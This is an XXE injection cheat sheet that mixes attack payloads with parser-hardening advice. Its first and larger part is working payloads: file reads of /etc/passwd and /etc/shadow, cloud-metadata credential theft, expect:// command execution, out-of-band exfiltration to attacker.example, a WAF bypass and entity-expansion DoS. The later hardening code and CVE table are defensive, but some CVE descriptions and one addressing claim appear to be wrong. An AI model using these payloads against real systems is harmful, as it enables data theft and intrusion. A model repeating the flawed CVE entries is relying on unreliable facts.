XML External Entity (XXE) injection abuses XML parsers that resolve external entities, letting an attacker read local files, perform SSRF, exfiltrate data via DNS/HTTP, or DoS the server through entity expansion. Test with a DOCTYPE declaring a SYSTEM entity pointing at file:///etc/passwd; if the response reflects content, you have classic XXE. If not, escalate to blind OOB DTD or error-based local-DTD reuse.
Beyond the XML body, probe SAML/SOAP envelopes, SVG and DOCX uploads, JSON endpoints accepting Content-Type: application/xml, and any pipeline that hits an XML parser indirectly (resume parsers, e-signature renderers, headless renderers). Modern XXE keeps appearing in SSO and document-conversion code paths.
Direct entity expansion where the parsed XML element is echoed back in the HTTP response. The simplest variant — the file content appears in a normal-looking response field.
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <stockCheck><productId>&xxe;</productId></stockCheck>
Defines an external general entity pointing at a local file; the parser substitutes &xxe; with the file content during expansion, which the application then echoes in its response.
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]> <r>&xxe;</r>
Same primitive on Windows targets — win.ini is a small, predictable file useful as a smoke test before pivoting to higher-value paths.
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">]> <r>&xxe;</r>
php://filter wraps the file read in a base64 encoder so binary or PHP-tag-containing files survive XML parsing — yields PHP source code, not just data files.
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "expect://id">]> <r>&xxe;</r>
When the PHP expect extension is loaded, expect:// runs a shell command and returns stdout — XXE-to-RCE in one payload.
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">]> <r>&xxe;</r>
External entities also resolve http:// URLs — pointing at the AWS instance metadata service yields IAM role credentials reachable from inside the VM.
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token">]> <r>&xxe;</r>
Same SSRF-via-XXE pattern against GCP's metadata server — yields a service-account OAuth token. Note GCP requires a Metadata-Flavor header normally, which XXE typically cannot send.
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/">]> <r>&xxe;</r>
Azure IMDS at the same RFC1918 address. Resource parameter chooses the API audience — management.azure.com gives ARM-control tokens.
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://10.0.0.5:6379/">]><r>&xxe;</r>
Differential timing or different error responses from the parser fingerprint open vs closed internal TCP ports — XXE turns into a port scanner.
When entity content is not reflected, host an external DTD that defines a parameter entity referencing a file:// URL plus a second entity that exfiltrates the content via HTTP/FTP query string. Required when the parser blocks inline parameter-entity definitions inside the document subset.
<?xml version="1.0"?> <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.example/exfil.dtd"> %xxe;]> <r>1</r>
Triggers the parser to fetch attacker-hosted exfil.dtd. The DTD then defines further parameter entities that exfiltrate file content out-of-band.
<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.example/x?d=%file;'>"> %eval; %exfil;
The %eval; trick rewrites a parameter entity at parse time so it embeds the file content in a URL — when %exfil; resolves, the parser issues an HTTP GET carrying the data.
<!ENTITY % file SYSTEM "file:///etc/shadow"> <!ENTITY % eval "<!ENTITY % exfil SYSTEM 'ftp://attacker.example:2121/%file;'>"> %eval; %exfil;
FTP control connections accept newlines and longer payloads than HTTP query strings — useful for files that contain LF or are larger than the URL length limit.
<!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://%file;.attacker.example/'>"> %eval; %exfil;
Encodes file content as a DNS subdomain. Even when outbound HTTP is blocked, internal DNS resolvers usually forward to the internet — yielding exfil with a single A-record lookup.
<?xml version="1.0"?> <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://YOUR-COLLAB.oastify.com/"> %xxe;]> <r>1</r>
Pure detection probe — any HTTP/DNS interaction received by Burp Collaborator confirms blind XXE without yet attempting file read.
When OOB egress is blocked, redefine entities inside a local DTD already on disk so that the parser surfaces file contents inside an error message. Standard targets are docbookx.dtd on Linux and cim20.dtd on Windows.
<?xml version="1.0"?>
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>
<message>x</message>Redefines the ISOamso parameter entity that docbookx.dtd already declares. When the parser reuses the entity later, it tries to load a non-existent file whose path embeds /etc/passwd content — the resulting "file not found" error surfaces the data.
<?xml version="1.0"?> <!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:/Windows/System32/wbem/xml/cim20.dtd"> <!ENTITY % SuperClass '<!ENTITY % file SYSTEM "file:///c:/windows/win.ini"><!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nope/%file;'>">%eval;%error;'> %local_dtd; ]> <m>x</m>
Same trick on Windows hosts using the WMI/CIM DTD that ships with every modern Windows install — SuperClass parameter entity gets redefined to leak file content via failed-load error.
<!DOCTYPE m [ <!ENTITY % local_dtd SYSTEM "jar:file:///opt/java/lib/jaxp-ri/jaxp-ri.jar!/com/sun/org/apache/xml/internal/serializer/XMLSchema.dtd"> %local_dtd; ]> <m>x</m>
Java parsers ship XMLSchema.dtd inside their own JARs reachable via jar:file://. When docbookx isn't present, this DTD provides another reusable parameter-entity surface for error-based exfil.
When the upstream layer strips DOCTYPE but the parser is XInclude-aware, inject xi:include inside any element to fetch external resources without a DOCTYPE declaration.
<foo xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include parse="text" href="file:///etc/passwd"/> </foo>
parse="text" pulls the file content as a text node so XML escaping doesn't mangle it. Bypasses DOCTYPE blocklists entirely because XInclude is enabled at parser-config level, not via DOCTYPE.
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://169.254.169.254/latest/meta-data/" parse="text"/></foo>
Fetches AWS instance metadata through XInclude — XInclude pulls remote resources just like external entities do.
XML embedded in non-XML-looking surfaces. SVG uploads (avatars, profile pictures), DOCX/XLSX/ODT (zip wrappers around XML), SOAP and SAML envelopes, and XMP image metadata all reach XML parsers downstream.
<?xml version="1.0" standalone="yes"?> <!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/hostname">]> <svg xmlns="http://www.w3.org/2000/svg"><text x="0" y="20">&xxe;</text></svg>
Renderers (ImageMagick, librsvg, headless Chromium) parse SVG as XML. The text element renders the entity-expanded file content directly into the rasterized output the user can download.
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="600" height="400"> <image xlink:href="file:///etc/passwd" width="600" height="400"/> </svg>
Some renderers fetch xlink:href targets even when general-entity expansion is disabled — file:// URI yields the file as the rendered "image" payload.
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE samlp:Response [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"> <samlp:Issuer>&xxe;</samlp:Issuer> </samlp:Response>
SAML endpoints typically accept XML envelopes. Adding a DOCTYPE before the signed elements injects the entity at parse time even though the SAML signature only covers a subset.
unzip target.docx -d out/ # modify out/word/document.xml to add a DOCTYPE # add <!DOCTYPE w:document [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> # replace a body text node with &xxe; cd out && zip -r ../malicious.docx .
DOCX is a zip of XML files. Unzipping, editing word/document.xml, and re-zipping gives a Word file that triggers XXE when ingested by resume parsers, document converters, or e-signature renderers.
<?xml version="1.0"?> <!DOCTYPE soap:Envelope [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body><user>&xxe;</user></soap:Body> </soap:Envelope>
Older SOAP stacks (Apache CXF, .NET WSE) frequently allow DOCTYPE in incoming envelopes, especially when the WSDL doesn't explicitly forbid it.
Modern frameworks (Spring, .NET, FastAPI) auto-negotiate content types. A JSON-only endpoint may quietly accept Content-Type: application/xml and dispatch to an unhardened XML parser. Switch the content type and re-send.
Content-Type: application/xml <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <root><id>&xxe;</id></root>
The handler dispatches by Content-Type. Switching from application/json to application/xml routes the request through Jackson/XStream/JAXB, which may not have entity resolution disabled.
Content-Type: text/xml <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <root><id>&xxe;</id></root>
Some dispatchers register text/xml separately from application/xml. Try both — text/xml routes through different parsers in older Java stacks.
iconv -f UTF-8 -t UTF-16LE payload.xml > payload-utf16.xml curl -H 'Content-Type: application/xml; charset=utf-16' --data-binary @payload-utf16.xml https://target/api
Many WAFs only inspect UTF-8 streams. Re-encoding the document as UTF-16LE with a BOM and submitting with charset=utf-16 sneaks past content inspection.
Recursive entity expansion or quadratic-blowup string repetition exhausts memory/CPU. Doesn't require external entities — relevant even when XXE is "patched" by disabling external resolution but DTDs are still allowed.
<?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY a0 "dosdosdos"> <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;"> <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;"> <!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;"> <!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;"> ]> <lolz>&a4;</lolz>
Each entity references the previous ten times — a4 expands to 10^4 copies of dosdosdos. Five levels deep yields hundreds of MB; eight levels DoSes most parsers without expansion limits.
<?xml version="1.0"?> <!DOCTYPE kaboom [<!ENTITY a "AAAAAAAAAAAAAAAAAA...(50,000 A)">]> <kaboom>&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;...(50,000 refs)</kaboom>
Single large entity referenced thousands of times — quadratic memory blowup that bypasses parsers protecting against exponential expansion only.
Ivanti Connect Secure exposed an unauthenticated SAML endpoint whose XML parser still permitted external entities even though the SAML library was supposedly hardened. Re-test SSO endpoints after every framework upgrade — SimpleSAMLphp xml-common (CVE-2024-52596) is the same antipattern in a popular library.
<!DOCTYPE samlp:Response [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
Even lxml with resolve_entities=False can be tricked when wrapper code constructs the parser without no_network=True or load_dtd=False. The constructor must specify ALL three flags — leaving any default exposes XXE.
When egress is firewalled, recycle on-disk DTDs (docbookx.dtd, cim20.dtd, oasis-xml-catalog.dtd, JDK's XMLSchema.dtd) for error-based exfil. HackTricks maintains a list of working DTDs per OS — pick one that ships with the target distro.
IMDSv1 (AWS) is reachable via XXE because the SSRF originates from inside the VM. Force IMDSv2 (PUT with X-aws-ec2-metadata-token-ttl-seconds header) where possible — XXE typically cannot send the required headers.
A JSON-only endpoint may quietly accept XML when the framework auto-negotiates. The content-type list in the request dispatcher is the real attack surface — Spring, Jackson, and .NET's ApiController all support both unless explicitly restricted.
Content-Type: application/xml <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root><id>&xxe;</id></root>
Image converters, PDF renderers and SVG ingestors are repeat XXE offenders. They accept SVG / MVG inputs and parse XML internally without the same hardening as the application server.
Many web WAFs only inspect UTF-8 streams. Re-encoding the document as UTF-16LE with a BOM (or UTF-7) and submitting with the corresponding charset in Content-Type bypasses content inspection while the underlying XML parser still accepts the encoding.
iconv -f UTF-8 -t UTF-16LE payload.xml | curl -H 'Content-Type: application/xml; charset=utf-16' --data-binary @- https://target/api
Disable DOCTYPE outright with disallow-doctype-decl, then disable external entities, parameter entities, external DTD loading and XInclude as defense-in-depth. Apply the same set across SAXParserFactory, XMLInputFactory and TransformerFactory.
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.SAXParserFactory;
import javax.xml.stream.XMLInputFactory;
import javax.xml.transform.TransformerFactory;
// DocumentBuilderFactory (DOM)
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
// SAXParserFactory
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
spf.setXIncludeAware(false);
// StAX
XMLInputFactory xif = XMLInputFactory.newInstance();
xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);
xif.setProperty("javax.xml.stream.isSupportingExternalEntities", false);
// TransformerFactory
TransformerFactory tf = TransformerFactory.newInstance();
tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");Use XmlReader with DtdProcessing.Prohibit and XmlResolver=null. Cap entity expansion via MaxCharactersFromEntities. For XmlDocument, explicitly null the resolver — the default since .NET 4.5.2 is safe but earlier code paths still appear in legacy apps.
using System.Xml;
// XmlReader (recommended)
var settings = new XmlReaderSettings {
DtdProcessing = DtdProcessing.Prohibit,
XmlResolver = null,
MaxCharactersFromEntities = 1024
};
using var reader = XmlReader.Create(stream, settings);
// XmlDocument — must explicitly null the resolver
var doc = new XmlDocument { XmlResolver = null };
doc.Load(stream);
// XPathDocument — same pattern
var xpath = new XPathDocument(reader);PHP 8.0+ disables external entity loading by default in libxml2, but defensive code should still set libxml_set_external_entity_loader to a null loader and pass LIBXML_NONET. Critically, do NOT pass LIBXML_NOENT — that flag *enables* entity substitution.
<?php // Defensive belt-and-braces — block external entity loader explicitly libxml_set_external_entity_loader(static fn() => null); // DOMDocument — LIBXML_NONET blocks network-fetched entities. Do NOT add LIBXML_NOENT. $dom = new DOMDocument(); $dom->loadXML($xml, LIBXML_NONET); // SimpleXML $xml = simplexml_load_string($input, "SimpleXMLElement", LIBXML_NONET); // XMLReader — set DtdProcessing equivalent via libxml options $reader = new XMLReader(); $reader->xml($xml, null, LIBXML_NONET);
Always prefer defusedxml drop-in replacements for stdlib XML modules. For lxml, build the XMLParser explicitly with resolve_entities=False, no_network=True, dtd_validation=False, load_dtd=False — leaving any default exposes XXE (CVE-2024-6508).
# GOOD — defusedxml as drop-in safe replacement
from defusedxml.ElementTree import fromstring
from defusedxml import minidom, sax
doc = fromstring(user_supplied_xml)
# lxml — must specify ALL flags
from lxml import etree
parser = etree.XMLParser(
resolve_entities=False,
no_network=True,
dtd_validation=False,
load_dtd=False,
)
tree = etree.fromstring(data, parser=parser)
# BAD — stdlib xml.etree without defusedxml is still vulnerable
# from xml.etree.ElementTree import fromstring # billion-laughs DoS reachableNokogiri exposes per-document parser flags. .nonet blocks network loads; .noent(false) prevents entity substitution. For REXML, set entity_expansion_limit = 0 to disable expansion entirely.
# Nokogiri
require 'nokogiri'
doc = Nokogiri::XML(input) { |c| c.strict.nonet.noent(false) }
# .noent(false) prevents entity substitution; .nonet blocks network loads.
# REXML
require 'rexml/document'
REXML::Document.entity_expansion_limit = 0
doc = REXML::Document.new(input)
# ruby-saml hardening — pin to >= 1.18 (CVE-2024-45409 fix line)Go's stdlib encoding/xml does not perform DTD processing or external entity expansion — XXE is structurally impossible. If using third-party libraries (etree, xmlquery), audit for DTD support before accepting attacker-controlled input.
package main
import (
"encoding/xml"
"io"
)
// SAFE by default — encoding/xml does not resolve external entities or DTDs.
type Stock struct {
XMLName xml.Name `xml:"stockCheck"`
ID string `xml:"productId"`
}
func parse(r io.Reader) (Stock, error) {
var s Stock
dec := xml.NewDecoder(r)
dec.Strict = true
return s, dec.Decode(&s)
}For SAML specifically, validate signatures on the raw canonical XML before parsing inner content and reject any document containing a DOCTYPE. Run XML-parsing services with no outbound network egress (deny-all + allowlist) so SSRF/exfil chains break even when XXE lands.
| CVE | Year | Title | Description |
|---|---|---|---|
| CVE-2024-22024 | 2024 | Ivanti Connect Secure unauthenticated SAML XXE | XXE in the SAML component of Ivanti Connect Secure / Policy Secure / ZTA reachable without authentication — granted access to restricted resources and triggered ransomware-precursor exploitation in early 2024. |
| CVE-2024-52596 | 2024 | SimpleSAMLphp xml-common XXE | Insufficiently hardened XML parser in SimpleSAMLphp's xml-common library exposed the SAML message-processing path to external entity injection — same antipattern as Ivanti, in a widely-used PHP SSO library. |
| CVE-2025-0162 | 2025 | IBM Aspera Shares authenticated XXE | Authenticated users could trigger XXE in the document-handling endpoints of IBM Aspera Shares, yielding file read and memory exhaustion. Patched by IBM bulletin 2025. |
| CVE-2024-6508 | 2024 | python-lxml resolver wrapper bypass | lxml with resolve_entities=False was still vulnerable when wrapper code did not also set no_network=True and load_dtd=False — multiple downstream applications inherited the misconfiguration. |
| CVE-2024-45409 | 2024 | ruby-saml SAML signature-bypass / XXE class | Same XML parser misconfiguration root cause as the SimpleSAMLphp issue — ruby-saml allowed crafted SAML responses to bypass signature validation, exploitable in concert with XXE. |
| CVE-2023-29007 | 2023 | Apache Calcite Avatica JDBC XML deserialization XXE | XXE via JDBC connection-string XML deserialization in Apache Calcite Avatica — affected analytic-database clients that ingested attacker-controlled connection metadata. |
| CVE-2023-32314 | 2023 | vm2 / Node ecosystem XXE-adjacent escape | XML-handling escape primitive in the Node ecosystem often chained with XXE in document pipelines (resume parsers, e-signature renderers) where user-controlled XML reached an unhardened parser. |